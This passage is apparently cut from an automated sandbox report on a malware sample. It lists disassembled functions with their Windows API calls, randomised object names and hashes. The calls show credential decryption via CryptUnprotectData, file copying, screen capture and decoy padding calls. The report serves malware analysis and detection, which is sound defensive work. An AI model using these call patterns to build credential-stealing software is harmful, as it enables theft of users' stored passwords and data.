                                                                • GetLastError.KERNEL32 ref: 0040E1C7
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regk8hftcvg,00000000,00020019,?), ref: 0040E1E3
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_k80jkq3z), ref: 0040E1ED
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regkst75e0p,00000000,00020019,?), ref: 0040E209
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040E20C
                                                                • FindFirstFileA.KERNEL32(s_kkyiaenp,?), ref: 0040E21E
                                                                • FindClose.KERNEL32(00000000), ref: 0040E225
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLzpeebx01), ref: 0040E23A
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E247
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regupf760yl,00000000,00020019,?), ref: 0040E25E
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_g3v549yp), ref: 0040E26B
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E272
                                                                • OutputDebugStringA.KERNEL32(t0bddrwll), ref: 0040E283
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regc448p6el,00000000,00020019,?), ref: 0040E29C
                                                                • LocalAlloc.KERNEL32(00000000,00000994), ref: 0040E2A6
                                                                • OutputDebugStringA.KERNEL32(t87ox2vav), ref: 0040E2B3
                                                                • LocalFree.KERNEL32(00000000), ref: 0040E2B6
                                                                • SetEnvironmentVariableA.KERNEL32(87mu9ra2,fte7n198), ref: 0040E2C6
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00001082,00000000), ref: 0040E2D8
                                                                • FindFirstFileW.KERNEL32(00401CFA,?), ref: 0040E2ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$OpenSemaphore$EventFileFindRelease$DebugFirstLocalMutexOutputStringTimerWaitable$AllocCancelCloseEnvironmentErrorFreeLastMappingResetVariable
                                                                • String ID: 87mu9ra2$MTX3t1mxx1o$SMPHR_g3v549yp$WTMR_k80jkq3z$XMLzpeebx01$ev_y69yttl7$fte7n198$regc448p6el$regk8hftcvg$regkst75e0p$regupf760yl$s_kkyiaenp$t0bddrwll$t87ox2vav
                                                                • API String ID: 1237335093-944470601
                                                                • Opcode ID: 12c53d688aaf42fd0fd5311077a8b7868668304a0fdd8d69c6117987e4c14de4
                                                                • Instruction ID: 31ab2c6cb457673253e68f9e851217f11488f9677f230774811abe720d91c125
                                                                • Opcode Fuzzy Hash: 12c53d688aaf42fd0fd5311077a8b7868668304a0fdd8d69c6117987e4c14de4
                                                                • Instruction Fuzzy Hash: 7B317531A40354BFE7105BA1AD4AFEA7E7CEB48B55F104026B701F64E0D6B85AC0866D
                                                                Function 0040EB7B Relevance: 66.6, APIs: 25, Strings: 13, Instructions: 132timememoryfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_t0ff7ckr,00000000,00000000,00000000), ref: 0040EB9A
                                                                • SetEvent.KERNEL32(00000000), ref: 0040EBA3
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040EBAA
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLydhp8k1n), ref: 0040EBB9
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EBC3
                                                                • OutputDebugStringA.KERNELBASE(tt3c7c6fy), ref: 0040EBCE
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ngcgpumk), ref: 0040EBDC
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040EBED
                                                                • SetEnvironmentVariableA.KERNEL32(t24qar9z,4jdvksst), ref: 0040EBF9
                                                                • FindFirstFileA.KERNEL32(s_7wz467a6,?), ref: 0040EC0B
                                                                • FindClose.KERNEL32(00000000), ref: 0040EC12
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000001C2,00000000), ref: 0040EC26
                                                                • OutputDebugStringA.KERNELBASE(trucacvw6), ref: 0040EC33
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EC3A
                                                                • SetEnvironmentVariableA.KERNEL32(suq142v5,byihy5ld), ref: 0040EC4A
                                                                • LocalAlloc.KERNEL32(00000000,00000446), ref: 0040EC57
                                                                • LocalFree.KERNEL32(00000000), ref: 0040EC5E
                                                                • OutputDebugStringA.KERNEL32(tq6azztln), ref: 0040EC69
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_dnq6ya3g), ref: 0040EC78
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040EC7F
                                                                • GetLastError.KERNEL32 ref: 0040EC84
                                                                • CreateSemaphoreA.KERNEL32(00000002,00000002,00000001,SMPHR_bssx0b6b), ref: 0040EC98
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000002), ref: 0040ECA2
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040ECC2
                                                                • LocalFree.KERNEL32(00000000), ref: 0040ED00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$LocalSemaphoreTimerWaitable$DebugEventOutputString$AllocCancelCloseEnvironmentFileFindFreeReleaseVariable$ErrorFirstHandleLastMappingReset
                                                                • String ID: 4jdvksst$SMPHR_bssx0b6b$WTMR_dnq6ya3g$WTMR_ngcgpumk$XMLydhp8k1n$byihy5ld$ev_t0ff7ckr$s_7wz467a6$suq142v5$t24qar9z$tq6azztln$trucacvw6$tt3c7c6fy
                                                                • API String ID: 3763755744-752573125
                                                                • Opcode ID: deda0546989f5746559434f21b6895729527d1026305a39062c01c5a602d5163
                                                                • Instruction ID: e378412a4146621b479b5594e62283f9f5d6cdb1d6790918a022ec3644d0d37a
                                                                • Opcode Fuzzy Hash: deda0546989f5746559434f21b6895729527d1026305a39062c01c5a602d5163
                                                                • Instruction Fuzzy Hash: 65417435A40250BBD7205BA1DD4DFEE3F78EF8D751F118426F705E65A0CB7849808769
                                                                Function 0040C15A Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 412windowtimelibraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDesktopWindow.USER32 ref: 0040C178
                                                                • LoadLibraryW.KERNEL32 ref: 0040C18E
                                                                • GetClientRect.USER32(?,?), ref: 0040C2EF
                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 0040C2F8
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 0040C32F
                                                                • SelectObject.GDI32(?,00000000), ref: 0040C362
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0040C39A
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • LocalAlloc.KERNEL32(00000000,00000BC9,00000000,?), ref: 0040C3DC
                                                                • GetLastError.KERNEL32 ref: 0040C3E4
                                                                • LocalFree.KERNEL32(00000000), ref: 0040C3EB
                                                                • OutputDebugStringA.KERNEL32(teeol7lw0), ref: 0040C3F6
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_h7wl254h), ref: 0040C405
                                                                • SetEvent.KERNEL32(00000000), ref: 0040C40E
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040C415
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pa5nd6cv), ref: 0040C423
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040C42E
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 0040C459
                                                                • LocalFree.KERNEL32(00000000), ref: 0040C4EB
                                                                • CloseHandle.KERNEL32(?), ref: 0040C4F5
                                                                • LocalFree.KERNEL32(?), ref: 0040C503
                                                                • LocalFree.KERNEL32(?), ref: 0040C50C
                                                                • LocalFree.KERNEL32(00000000), ref: 0040C5D7
                                                                • LocalFree.KERNEL32(?), ref: 0040C5E0
                                                                • LocalFree.KERNEL32(?), ref: 0040C5E9
                                                                • LocalFree.KERNEL32(?), ref: 0040C5F0
                                                                • LocalFree.KERNEL32(00000000), ref: 0040C5F7
                                                                  • Part of subcall function 0040B3DA: LocalAlloc.KERNEL32(00000040,0000C350,00000000,00000000,00000001,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000), ref: 0040B3F4
                                                                  • Part of subcall function 0040B3DA: lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4C3
                                                                  • Part of subcall function 0040B3DA: lstrlenW.KERNEL32(?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4CA
                                                                  • Part of subcall function 0040B3DA: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B4E9
                                                                  • Part of subcall function 0040B3DA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,0040D85A,00000001,?,00000000,00000000,?), ref: 0040B500
                                                                • DeleteObject.GDI32(?), ref: 0040C604
                                                                • DeleteObject.GDI32(?), ref: 0040C60D
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0040C618
                                                                • ReleaseDC.USER32(?,00000000), ref: 0040C622
                                                                • LocalFree.KERNEL32(?), ref: 0040C632
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$EventTimerWaitable$AllocObjectRelease$CancelDebugErrorLastOutputString$CloseDeleteEnvironmentFileHandleMutexOpenResetSemaphoreStretchVariablelstrlen$ClientDesktopLibraryLoadMappingModeRectSelectWindow
                                                                • String ID: WTMR_pa5nd6cv$ev_h7wl254h$teeol7lw0
                                                                • API String ID: 1845290641-3741897219
                                                                • Opcode ID: d578d4945d7ba14774c9556d6f93c57a01507d3923014cf636d1802cb545dac6
                                                                • Instruction ID: 21d74fce23984860edf060affd158e4b441c6a502b83ec71da3ef7fae4716755
                                                                • Opcode Fuzzy Hash: d578d4945d7ba14774c9556d6f93c57a01507d3923014cf636d1802cb545dac6
                                                                • Instruction Fuzzy Hash: 91E1FA71900604FFDB11DFE4DC84EEE7BB9EB8D700B108029FA19E72A0D77499419BA8
                                                                Function 004087AA Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 319memorystringfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • StrCpyW.SHLWAPI(00000000,00000000), ref: 004087D4
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 004087F4
                                                                • PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 0040883E
                                                                • LocalAlloc.KERNEL32(00000040,00800400), ref: 00408863
                                                                • LocalAlloc.KERNEL32(00000040,00800400), ref: 00408870
                                                                • LocalAlloc.KERNEL32(00000040,00800400), ref: 0040887D
                                                                • lstrlenW.KERNEL32 ref: 00408930
                                                                • lstrlenW.KERNEL32(004081BE), ref: 0040893B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$AllocCreate$TimerWaitablelstrlen$Event$CancelDebugEnvironmentErrorFileFindLastMutexOutputStringVariable$ChangeCloseCombineFirstFreeMappingNotificationPathReleaseReset
                                                                • String ID: .
                                                                • API String ID: 3781308342-248832578
                                                                • Opcode ID: 654afccece7d91c704e0c135c4a9fbdcf9fb10244e10c53e820dd268376c0b37
                                                                • Instruction ID: 41ca6f609a914c53ae2253612664a49f2bd2a403a3a6681f5a81f17edcbbdd86
                                                                • Opcode Fuzzy Hash: 654afccece7d91c704e0c135c4a9fbdcf9fb10244e10c53e820dd268376c0b37
                                                                • Instruction Fuzzy Hash: 75C12B71E00605EFDB14DFA4DC85AEEBBB9FB88304F10807AE915A7391DB745D018BA8
                                                                Function 0040318A Relevance: 36.4, APIs: 24, Instructions: 437memoryfileencryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000400,?,?,00000000), ref: 004031A4
                                                                • LocalFree.KERNEL32(00000000), ref: 00403217
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00403235
                                                                • LocalFree.KERNEL32(00000000), ref: 00403266
                                                                • LocalFree.KERNEL32(00000000), ref: 00403275
                                                                • LocalFree.KERNEL32(00000000), ref: 00403284
                                                                • LocalFree.KERNEL32(00000000), ref: 0040328F
                                                                • LocalFree.KERNEL32(00000000), ref: 0040329A
                                                                • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00403396
                                                                • LocalFree.KERNEL32(00000000), ref: 004033C0
                                                                • LocalFree.KERNEL32(?), ref: 004033C7
                                                                • LocalFree.KERNEL32(00000000), ref: 004033F3
                                                                • LocalFree.KERNEL32(?), ref: 004033FA
                                                                • LocalFree.KERNEL32(00000000), ref: 0040369D
                                                                • LocalFree.KERNEL32(?), ref: 004036AB
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$TimerWaitable$Event$AllocCancelDebugEnvironmentErrorFileLastMutexOpenOutputReleaseSemaphoreStringVariable$CloseCopyCryptDataHandleMappingResetUnprotect
                                                                • String ID:
                                                                • API String ID: 2948959367-0
                                                                • Opcode ID: 9927978a137d84ba5d4d0da22d8ffc6fac1708155b8237a59c8ff4a1cc245d64
                                                                • Instruction ID: 19265eb1ad024d6af1d01535d6ddcd3080084c10e456fc725a0d62a368887209
                                                                • Opcode Fuzzy Hash: 9927978a137d84ba5d4d0da22d8ffc6fac1708155b8237a59c8ff4a1cc245d64
                                                                • Instruction Fuzzy Hash: 6BF16131900615EFDB11DFA4EC44AEE7FBAFF89311F148066E911B72A0DB355A01CBA9
                                                                Function 004044BB Relevance: 34.9, APIs: 23, Instructions: 407fileencryptionstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalFree.KERNEL32(00000000), ref: 00404548
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00404566
                                                                • LocalFree.KERNEL32(00000000), ref: 00404597
                                                                • LocalFree.KERNEL32(00000000), ref: 004045A6
                                                                • LocalFree.KERNEL32(00000000), ref: 004045B5
                                                                • LocalFree.KERNEL32(00000000), ref: 004045C0
                                                                • LocalFree.KERNEL32(00000000), ref: 004045CB
                                                                • CopyFileW.KERNEL32(00000000,?,00000000), ref: 004046C7
                                                                • LocalFree.KERNEL32(00000000), ref: 004046F1
                                                                • LocalFree.KERNEL32(?), ref: 004046F8
                                                                • LocalFree.KERNEL32(00000000), ref: 00404724
                                                                • LocalFree.KERNEL32(?), ref: 0040472B
                                                                • lstrlenW.KERNEL32(?), ref: 00404861
                                                                • LocalFree.KERNEL32(00000000), ref: 0040497B
                                                                • LocalFree.KERNEL32(?), ref: 00404989
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$TimerWaitable$Event$CancelDebugEnvironmentErrorFileLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseCopyCryptDataHandleMappingResetUnprotectlstrlen
                                                                • String ID:
                                                                • API String ID: 698892155-0
                                                                • Opcode ID: 7987c35453d97dd2043921dbae92dcd9eb56a0a6e14bc0e3ca25a24f6233714c
                                                                • Instruction ID: b2c253b8d8952a74746669566927e24b8529b538fe979c93d24da04b41904070
                                                                • Opcode Fuzzy Hash: 7987c35453d97dd2043921dbae92dcd9eb56a0a6e14bc0e3ca25a24f6233714c
                                                                • Instruction Fuzzy Hash: FAE14F71900615EFDB11DFA4EC45AEE7BB6FF89310F148075EA11B72A0DB395A00CBA9
                                                                Function 00403E9F Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 255memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403F00
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403F1A
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00403F35
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocLocal
                                                                • String ID: .
                                                                • API String ID: 3494564517-248832578
                                                                • Opcode ID: 1244acdfef9d02aa457a76575c2f03664124f1d7901f44f75006ec78d879c916
                                                                • Instruction ID: 0e215f248a8e1fcd69b20d46db8bab7dae96d6d05561c88b5daff5afe19be196
                                                                • Opcode Fuzzy Hash: 1244acdfef9d02aa457a76575c2f03664124f1d7901f44f75006ec78d879c916
                                                                • Instruction Fuzzy Hash: D5913E75A00605EFDB059FE4DC49EEE7BB5FB8C300B008579EA15A72A0DB795D01CBA8
                                                                Function 004041AD Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 255memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040420E
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00404228
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00404243
                                                                Strings
                                                                Memory Dump Source
